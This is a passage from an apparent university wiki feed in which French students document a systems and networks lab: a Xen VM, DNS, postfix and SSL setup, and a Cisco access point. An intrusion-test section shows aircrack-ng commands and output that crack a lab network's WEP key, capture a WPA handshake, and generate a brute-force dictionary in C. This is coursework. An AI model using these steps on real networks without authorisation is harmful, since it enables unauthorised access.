&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
// Configuration de eth0&lt;br /&gt;
# The primary network interface&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
 address 193.48.57.181&lt;br /&gt;
 netmask 255.255.255.240&lt;br /&gt;
 gatway 193.48.57.190&lt;br /&gt;
&lt;br /&gt;
root@chien:~# ifdown eth0 &lt;br /&gt;
root@chien:~# ifup eth0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
root@chien:~# apt-get install vim strace tcpdump &lt;br /&gt;
root@chien:~# apt-get install host&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h1&amp;gt;Services Internet &amp;lt;/h1&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Serveur DNS&amp;lt;/h2&amp;gt;&lt;br /&gt;
modification du fichier /var/cache/bind option&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
cat /etc/bind/named.conf.options &lt;br /&gt;
**** afficher le fichier ****&lt;br /&gt;
&lt;br /&gt;
host -t ni love-in-the-world.space&lt;br /&gt;
host -t any love-in-the-world.space&lt;br /&gt;
&lt;br /&gt;
cat db.love-in-the-world &lt;br /&gt;
**** afficher le fichier ****&lt;br /&gt;
&lt;br /&gt;
cat /var/log/daemon.log&lt;br /&gt;
**** afficher le fichier ****&lt;br /&gt;
&lt;br /&gt;
service bind9 stop&lt;br /&gt;
service bind9 start&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Recuperation du certificat SSL&amp;lt;/h2&amp;gt;&lt;br /&gt;
Cette étape consiste a récupérer le certificat SSL en vu authentifier et de sécuriser la connexion a notre serveur &lt;br /&gt;
&lt;br /&gt;
Instalation et Configuration de la boite Mail &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
  apt-get install postfix bsd-mailx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
configuration de la boite mail &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 #nano /etc/aliases&lt;br /&gt;
   postmaster:    root&lt;br /&gt;
   admin: root&lt;br /&gt;
 &lt;br /&gt;
 #newaliases&lt;br /&gt;
 #mailx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Je m'envoi un mail pour verifier le bon fonctionement de la boite mail &lt;br /&gt;
E-mail: admin@love-in-the-world.space&lt;br /&gt;
&lt;br /&gt;
Verfification:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#mailx&lt;br /&gt;
From Maxime.Strunc@polytech-lille.net  Fri Nov 20 13:22:24 2015&lt;br /&gt;
Return-Path: &amp;lt;Maxime.Strunc@polytech-lille.net&amp;gt;&lt;br /&gt;
X-Original-To: admin@love-in-the-world.space&lt;br /&gt;
Delivered-To: admin@love-in-the-world.space&lt;br /&gt;
Received: from peronne.escaut.net (peronne.escaut.net [193.48.57.26])&lt;br /&gt;
	by chien (Postfix) with ESMTP id E7DA93421F&lt;br /&gt;
	for &amp;lt;admin@love-in-the-world.space&amp;gt;; Fri, 20 Nov 2015 13:22:24 +0100 (CET)&lt;br /&gt;
X-Virus-Scanned: Debian amavisd-new at polytech-lille.fr&lt;br /&gt;
X-Virus-Scanned: Debian amavisd-new at polytech-lille.fr&lt;br /&gt;
Received: from webmailportal.polytech-lille.fr (hirson.escaut.net [193.48.57.37])&lt;br /&gt;
	(Authenticated sender: mstrunc)&lt;br /&gt;
	by peronne.escaut.net (Postfix) with ESMTPA id 305081C38&lt;br /&gt;
	for &amp;lt;admin@love-in-the-world.space&amp;gt;; Fri, 20 Nov 2015 11:33:52 +0100 (CET)&lt;br /&gt;
MIME-Version: 1.0&lt;br /&gt;
Content-Type: text/plain; charset=UTF-8;&lt;br /&gt;
 format=flowed&lt;br /&gt;
Content-Transfer-Encoding: 7bit&lt;br /&gt;
Date: Fri, 20 Nov 2015 11:33:52 +0100&lt;br /&gt;
From: Maxime Strunc &amp;lt;Maxime.Strunc@polytech-lille.net&amp;gt;&lt;br /&gt;
To: &amp;lt;admin@love-in-the-world.space&amp;gt;&lt;br /&gt;
Subject: Hello&lt;br /&gt;
Message-ID: &amp;lt;478f6b7d2da9875c32551984f2b92f9f@polytech-lille.net&amp;gt;&lt;br /&gt;
X-Sender: Maxime.Strunc@polytech-lille.net&lt;br /&gt;
User-Agent: Roundcube Webmail/0.7.2&lt;br /&gt;
Status: RO&lt;br /&gt;
&lt;br /&gt;
Hey it's working&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
- Recupération du Certificat:&lt;br /&gt;
Je vais sur Gandi.net&lt;br /&gt;
&lt;br /&gt;
génération de la CSR&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@chien:~#   openssl req -nodes -newkey rsa:2048 -sha256 -keyout chien.key -out chien.csr&lt;br /&gt;
// Il ya plusieurs informations à rentrer, il y en a une très important : c'et le mail : &lt;br /&gt;
admin@love-in-the-world.space&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
apres avoir renseigner tout les champs, &lt;br /&gt;
j'obtient la CSR: &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 -----BEGIN CERTIFICATE REQUEST-----&lt;br /&gt;
       ... texte crypter...&lt;br /&gt;
-----END CERTIFICATE REQUEST-----&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Je la copie dans l'emplacement voulue sur gandi.net&lt;br /&gt;
&lt;br /&gt;
Gandi m'envoi un mail a l'adresse informée &amp;quot;admin@love-in-the-world.space&amp;quot;&lt;br /&gt;
Il faut donc clique sur un lien de confimation et entrer la cles fournit dans le mail.&lt;br /&gt;
Une fois le certificat reçut, Je le copie et le colle dans le chien.crt et gandi.crt&lt;br /&gt;
  &lt;br /&gt;
&amp;lt;h1&amp;gt;Test d'intrusion &amp;lt;/h1&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;a) Préparation &amp;lt;/h2&amp;gt;&lt;br /&gt;
- Instalation aircrack-ng&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
apt-get install aircrack-ng firmware ralink&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
- Instalation du port usb-Wifi&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
apt-get install firmware ralink&lt;br /&gt;
airmon-ng start wlan1&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;b) Cassage d'une cles WEP &amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Je scan le reseaux Wifi: &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
airodump-ng mon0 --channel 5&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
J’identifie le ssid de cracotte06 et je met les donnée  dans un fichier nommé fcracotte06&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 root@Discus:/home/pifou# airodump-ng mon0 --channel 5 --bssid 04:DA:D2:9C:50:55 -w&lt;br /&gt;
fcracotte06&lt;br /&gt;
&lt;br /&gt;
CH 5 ][ Elapsed: 0 s ][ 2015-11-20 09:05 &lt;br /&gt;
&lt;br /&gt;
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID&lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:55 -55 28 29 420 116 5 54e. WEP WEP cracotte06 &lt;br /&gt;
&lt;br /&gt;
BSSID STATION PWR Rate Lost Frames Probe &lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:55 00:0F:B5:92:23:74 -48 36e-54e 80 456 &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
La capture a donc commencé &lt;br /&gt;
&lt;br /&gt;
Dans un autre terminal:&lt;br /&gt;
Je vais analyser mon fichier de capture pour casser la cles.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ls&lt;br /&gt;
aircrack-ng fcracotte06-01.cap&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
apres quelque minutes on obtient la cles &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
                 [00:06:58] Tested 965565 keys (got 60459 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/  1   AA(85504) EA(73728) 60(70144) 0C(69120) 33(68608) &lt;br /&gt;
    1    0/  1   AA(77824) 25(74496) BC(70400) 6C(70144) 3B(69632) &lt;br /&gt;
    2    0/  1   AA(79872) 3E(70912) 76(70400) 5C(70144) 01(68864) &lt;br /&gt;
    3    4/  5   AA(71680) FA(68608) 41(68352) 38(68096) 49(68096) &lt;br /&gt;
    4    0/  1   AA(86016) A1(70912) 80(69632) 2A(68352) 65(68352) &lt;br /&gt;
    5    0/  1   AA(85760) AF(73216) C6(71424) 5A(71168) 25(70400) &lt;br /&gt;
    6    0/  1   AA(75520) 26(70400) CB(70400) 46(69888) 1C(69632) &lt;br /&gt;
    7    0/  1   AA(83968) 18(71680) 4C(71424) 74(70144) 1E(69632) &lt;br /&gt;
    8    0/  1   AA(82176) 6F(70912) F7(70144) FB(69632) 17(68864) &lt;br /&gt;
    9    0/  3   D7(73216) 97(71168) A4(70400) BA(70144) FE(69632) &lt;br /&gt;
   10    0/  1   5F(78336) D6(72960) 46(71424) CB(68608) 8D(68352) &lt;br /&gt;
   11   13/  1   48(67072) 60(67072) F6(66816) AC(66560) 2B(66048) &lt;br /&gt;
   12    0/  1   BB(79580) A7(71096) 8B(69960) 13(69196) 68(68424) &lt;br /&gt;
&lt;br /&gt;
             KEY FOUND! [ AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:BB:BB:BB ] &lt;br /&gt;
	Decrypted correctly: 100%&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;c) Cassage d'une cles WPA&amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
airodump-ng --encrypt wpa mon0&lt;br /&gt;
&lt;br /&gt;
# airodump-ng --encrypt wpa mon0 -c 7 --bssid 04:DA:D2:9C:50:55 -w wpacracotte06&lt;br /&gt;
&lt;br /&gt;
CH 7 ][ Elapsed: 26 mins ][ 2015-11-20 10:40 ][ WPA handshake: 04:DA:D2:9C:50:55 &lt;br /&gt;
&lt;br /&gt;
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID&lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:55 -70 22 9735 1905 18 7 54e. WPA2 CCMP PSK cracotte06 &lt;br /&gt;
&lt;br /&gt;
BSSID STATION PWR Rate Lost Frames Probe &lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:55 00:0F:B5:92:23:74 -70 54e- 1e 904 1249 &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 - creation d'un dictionaire :&lt;br /&gt;
code C:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
int main ()&lt;br /&gt;
{&lt;br /&gt;
int val=0;&lt;br /&gt;
for(val=0;val&amp;lt;99999999 ;val++)&lt;br /&gt;
{printf(&amp;quot;%08d\n&amp;quot;,val); }&lt;br /&gt;
return 0;&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Compilation :&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
gcc -Wall Dictionnaire.c -o Dictionnaire&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Création :&lt;br /&gt;
On exécute le programme Dictionnaire et on renvoi les résultats dans le fichier Dico&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
./Dictionnaire &amp;gt; Dico&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Cassage de la cles: &lt;br /&gt;
après avoir récuperer le Handshake du Wifi carotte06&lt;br /&gt;
Je vais casser la clés en utilisant mon dictionnaire &amp;quot;Dico&amp;quot; le fichier &amp;quot;wpacracotte06-02.cap&amp;quot;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
mettre serveur messagerie &lt;br /&gt;
demander certificat&lt;br /&gt;
&lt;br /&gt;
securisation wifi &lt;br /&gt;
WPA-EAP&lt;/div&gt;</summary>
		<author><name>Mstrunc</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&amp;diff=23126</id>
		<title>TP sysres IMA2a5 2015/2016 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&amp;diff=23126"/>
				<updated>2015-11-22T17:26:45Z</updated>
		
		<summary type="html">&lt;p&gt;Mstrunc : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Projet Système &amp;amp; Réseaux  IMA2A S9 &lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;h1&amp;gt;Configuration du point d’accès&amp;lt;/h1&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;a) Restriction par adresse MAC &amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ci-dessous, le tableau regroupant Les adresses et Vlan associés aux élèves :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Nom&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;adresse MAC&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Nounours&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e7::19:f3&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Jeuno&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e6:ed:b1&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;John&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:22:43:43:e7:7d&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Loki&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e7:64:03&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On récupère les adresses mac comme ci dessous.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
pifou@heron:~$ su&lt;br /&gt;
Mot de passe : &lt;br /&gt;
root@heron:/home/pifou# ifconfig &lt;br /&gt;
lo        Link encap:Boucle locale  &lt;br /&gt;
          inet adr:127.0.0.1  Masque:255.0.0.0&lt;br /&gt;
          adr inet6: ::1/128 Scope:Hôte&lt;br /&gt;
          UP LOOPBACK RUNNING  MTU:65536  Metric:1&lt;br /&gt;
          RX packets:2348 errors:0 dropped:0 overruns:0 frame:0&lt;br /&gt;
          TX packets:2348 errors:0 dropped:0 overruns:0 carrier:0&lt;br /&gt;
          collisions:0 lg file transmission:0 &lt;br /&gt;
          RX bytes:244556 (238.8 KiB)  TX bytes:244556 (238.8 KiB)&lt;br /&gt;
&lt;br /&gt;
wlan0     Link encap:Ethernet  HWaddr 00:22:43:43:e7:7d  &lt;br /&gt;
          inet adr:172.26.79.61  Bcast:172.26.79.255  Masque:255.255.240.0&lt;br /&gt;
          adr inet6: fe80::222:43ff:fe43:e77d/64 Scope:Lien&lt;br /&gt;
          adr inet6: 2001:660:4401:6006:222:43ff:fe43:e77d/64 Scope:Global&lt;br /&gt;
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1&lt;br /&gt;
          RX packets:12046 errors:0 dropped:1471 overruns:0 frame:0&lt;br /&gt;
          TX packets:9787 errors:0 dropped:0 overruns:0 carrier:0&lt;br /&gt;
          collisions:0 lg file transmission:1000 &lt;br /&gt;
          RX bytes:7742849 (7.3 MiB)  TX bytes:1442360 (1.3 MiB)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;    1) Configuration du point d’accès Cisco &amp;lt;/h3&amp;gt;&lt;br /&gt;
Conexion a la borne Cisco :&lt;br /&gt;
-Branchement en comunication serie sur le port RJ45 (Console de la Cisco).&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
pifou@zabeth04:~$ su&lt;br /&gt;
pifou@zabeth04:~$ minicom&lt;br /&gt;
&lt;br /&gt;
// conexion au point Cisco &lt;br /&gt;
ap#enable&lt;br /&gt;
ap#Config t &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Il faut autoriser les  adresses mac désignés à ce connecter aux point d’accès et refuser l’accès des autres &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ap(config)#no access-list 701 deny  0000.0000.0000 ffff.ffff.ffff               &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe7.6403  0000.0000.0000               &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe6.edb1  0000.0000.0000 &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe7.19f3  0000.0000.0000&lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe6.edb1  0000.0000.0000 &lt;br /&gt;
ap(config)#access-list 701 deny    0000.0000.0000  ffff.ffff.ffff &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Configuration du SSID &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ap(config)#dot11 ssid T2&lt;br /&gt;
ap(config-ssid)#dot11 ssid T2 &lt;br /&gt;
ap(config-ssid)#authentication open&lt;br /&gt;
ap(config-ssid)#guest-mode &lt;br /&gt;
ap(config)#interface dot11Radio0 &lt;br /&gt;
&lt;br /&gt;
ap(config-if)#ssid T2&lt;br /&gt;
ap(config-if)#encryption key 1&lt;br /&gt;
ap(config-if)#encryption key 1 size 40bit 0 01abcd1532 transmit-key&lt;br /&gt;
ap(config-if)#encryption mode Wep mandatory &lt;br /&gt;
end&lt;br /&gt;
&lt;br /&gt;
ap(config)#interface Dot11Radio0&lt;br /&gt;
ap(config-if)#no shutdown&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour voir si des machines sont connecté sur le point d’accès  &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
sh do11 associations&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;    1) Configuration du Wifi sur l'eeePC &amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Configuration:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@heron:/home/pifou# cat /etc/network/interfaces&lt;br /&gt;
source /etc/network/interfaces.d/*&lt;br /&gt;
&lt;br /&gt;
# The loopback network interface&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
# Ethernet interface&lt;br /&gt;
#auto eth0&lt;br /&gt;
#iface eth0 inet static&lt;br /&gt;
#  address 172.26.79.241&lt;br /&gt;
#  netmask 255.255.240.0&lt;br /&gt;
#  gateway 172.26.79.254&lt;br /&gt;
&lt;br /&gt;
auto wlan0&lt;br /&gt;
iface wlan0 inet static&lt;br /&gt;
	wireless-mode managed&lt;br /&gt;
	wireless-essid T2&lt;br /&gt;
	wireless-key 1111111111&lt;br /&gt;
	address 172.26.79.61&lt;br /&gt;
	netmask 255.255.240.0&lt;br /&gt;
	gateway 172.26.79.254&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
conexion au PA&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ifup wlan0&lt;br /&gt;
iwconfig wlan0 essid T2&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
on est bien connecté :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
wlan0     IEEE 802.11bgn  ESSID:&amp;quot;T2&amp;quot;  &lt;br /&gt;
          Mode:Managed  Frequency:2.447 GHz  Access Point: C4:14:3C:12:EA:00   &lt;br /&gt;
          Bit Rate=54 Mb/s   Tx-Power=20 dBm   &lt;br /&gt;
          Retry short limit:7   RTS thr:off   Fragment thr:off&lt;br /&gt;
          Encryption key:1111-1111-11&lt;br /&gt;
          Power Management:off&lt;br /&gt;
          Link Quality=70/70  Signal level=-38 dBm  &lt;br /&gt;
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0&lt;br /&gt;
          Tx excessive retries:0  Invalid misc:4104   Missed beacon:0&lt;br /&gt;
&lt;br /&gt;
lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h1&amp;gt;Installation des systèmes d'exploitation &amp;lt;/h1&amp;gt;&lt;br /&gt;
Dans ce chapitre je vais installer deux système d'exploitation , Il s'agit de Debian 8.&lt;br /&gt;
Dans un premier temps j’installerais une machine virtuel Xen sur la cordouan, le but étant par la suite de réaliser un serveur web sécurisé.&lt;br /&gt;
Dans une seconde partie j’installerais Debian 8 sur un des nouveau pc HP que nous avons reçut, nous nous en serviront pour la partie des tests d'intrusions. &lt;br /&gt;
  &lt;br /&gt;
&amp;lt;h2&amp;gt;Installation de la machine virtuel&amp;lt;/h2&amp;gt;&lt;br /&gt;
Cette partie concerne l’installation du machine virtuel Xen.&lt;br /&gt;
Nous installons Xen car celui-ci permet de faire de la  paravirtualisation. &lt;br /&gt;
Nous en avons besoins pour que chacun puisse installer son propre système d'exploitation et qu'ils soit utilisable en même temps &lt;br /&gt;
&lt;br /&gt;
Les étapes a suivre pour l’installation de Xen sur cordouan:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
// Conexion au serveur &lt;br /&gt;
ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
// Création de la Machine virtuel ( nom : chien)&lt;br /&gt;
xen-create-image --hostname chien --ip 193.48.57.181 --dir /usr/local/xen&lt;br /&gt;
&lt;br /&gt;
// On observe la virtualisation&lt;br /&gt;
tail -f /var/log/xen-tools/chien.log&lt;br /&gt;
&lt;br /&gt;
root@cordouan:~# cd /etc/xen/&lt;br /&gt;
root@cordouan:/etc/xen# vim chien.cfg &lt;br /&gt;
// on met plus de memoire  =&amp;gt; 1024&lt;br /&gt;
// conexion en mode bridge=IMA2a&lt;br /&gt;
&lt;br /&gt;
root@cordouan:/etc/xen# xl list&lt;br /&gt;
root@cordouan:/etc/xen# xl create chien.cfg&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
connexion à notre MV:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
root@cordouan:/etc/xen# xl console chien&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Configuration de Xen:&lt;br /&gt;
- On autorise les connexion ssh en root&lt;br /&gt;
- On retire Network Manger pour configurer la connexion au réseau manuellement &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
/etc/ssh/sshd_config&lt;br /&gt;
PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
if down eth0 &lt;br /&gt;
ifup etho&lt;br /&gt;
apt-get purge network-manage systemd &lt;br /&gt;
/etc/inittable&lt;br /&gt;
// fin ligne tty0 ==&amp;gt; hvc0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
// Configuration de eth0&lt;br /&gt;
# The primary network interface&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
 address 193.48.57.181&lt;br /&gt;
 netmask 255.255.255.240&lt;br /&gt;
 gatway 193.48.57.190&lt;br /&gt;
&lt;br /&gt;
root@chien:~# ifdown eth0 &lt;br /&gt;
root@chien:~# ifup eth0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
root@chien:~# apt-get install vim strace tcpdump &lt;br /&gt;
root@chien:~# apt-get install host&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h1&amp;gt;Services Internet &amp;lt;/h1&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Serveur DNS&amp;lt;/h2&amp;gt;&lt;br /&gt;
modification du fichier /var/cache/bind option&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
cat /etc/bind/named.conf.options &lt;br /&gt;
**** afficher le fichier ****&lt;br /&gt;
&lt;br /&gt;
host -t ni love-in-the-world.space&lt;br /&gt;
host -t any love-in-the-world.space&lt;br /&gt;
&lt;br /&gt;
cat db.love-in-the-world &lt;br /&gt;
**** afficher le fichier ****&lt;br /&gt;
&lt;br /&gt;
cat /var/log/daemon.log&lt;br /&gt;
**** afficher le fichier ****&lt;br /&gt;
&lt;br /&gt;
service bind9 stop&lt;br /&gt;
service bind9 start&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Recuperation du certificat SSL&amp;lt;/h2&amp;gt;&lt;br /&gt;
Cette étape consiste a récupérer le certificat SSL en vu authentifier et de sécuriser la connexion a notre serveur &lt;br /&gt;
&lt;br /&gt;
Instalation et Configuration de la boite Mail &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
  apt-get install postfix bsd-mailx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
configuration de la boite mail &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 #nano /etc/aliases&lt;br /&gt;
   postmaster:    root&lt;br /&gt;
   admin: root&lt;br /&gt;
 &lt;br /&gt;
 #newaliases&lt;br /&gt;
 #mailx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Je m'envoi un mail pour verifier le bon fonctionement de la boite mail &lt;br /&gt;
E-mail: admin@love-in-the-world.space&lt;br /&gt;
&lt;br /&gt;
Verfification:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#mailx&lt;br /&gt;
From Maxime.Strunc@polytech-lille.net  Fri Nov 20 13:22:24 2015&lt;br /&gt;
Return-Path: &amp;lt;Maxime.Strunc@polytech-lille.net&amp;gt;&lt;br /&gt;
X-Original-To: admin@love-in-the-world.space&lt;br /&gt;
Delivered-To: admin@love-in-the-world.space&lt;br /&gt;
Received: from peronne.escaut.net (peronne.escaut.net [193.48.57.26])&lt;br /&gt;
	by chien (Postfix) with ESMTP id E7DA93421F&lt;br /&gt;
	for &amp;lt;admin@love-in-the-world.space&amp;gt;; Fri, 20 Nov 2015 13:22:24 +0100 (CET)&lt;br /&gt;
X-Virus-Scanned: Debian amavisd-new at polytech-lille.fr&lt;br /&gt;
X-Virus-Scanned: Debian amavisd-new at polytech-lille.fr&lt;br /&gt;
Received: from webmailportal.polytech-lille.fr (hirson.escaut.net [193.48.57.37])&lt;br /&gt;
	(Authenticated sender: mstrunc)&lt;br /&gt;
	by peronne.escaut.net (Postfix) with ESMTPA id 305081C38&lt;br /&gt;
	for &amp;lt;admin@love-in-the-world.space&amp;gt;; Fri, 20 Nov 2015 11:33:52 +0100 (CET)&lt;br /&gt;
MIME-Version: 1.0&lt;br /&gt;
Content-Type: text/plain; charset=UTF-8;&lt;br /&gt;
 format=flowed&lt;br /&gt;
Content-Transfer-Encoding: 7bit&lt;br /&gt;
Date: Fri, 20 Nov 2015 11:33:52 +0100&lt;br /&gt;
From: Maxime Strunc &amp;lt;Maxime.Strunc@polytech-lille.net&amp;gt;&lt;br /&gt;
To: &amp;lt;admin@love-in-the-world.space&amp;gt;&lt;br /&gt;
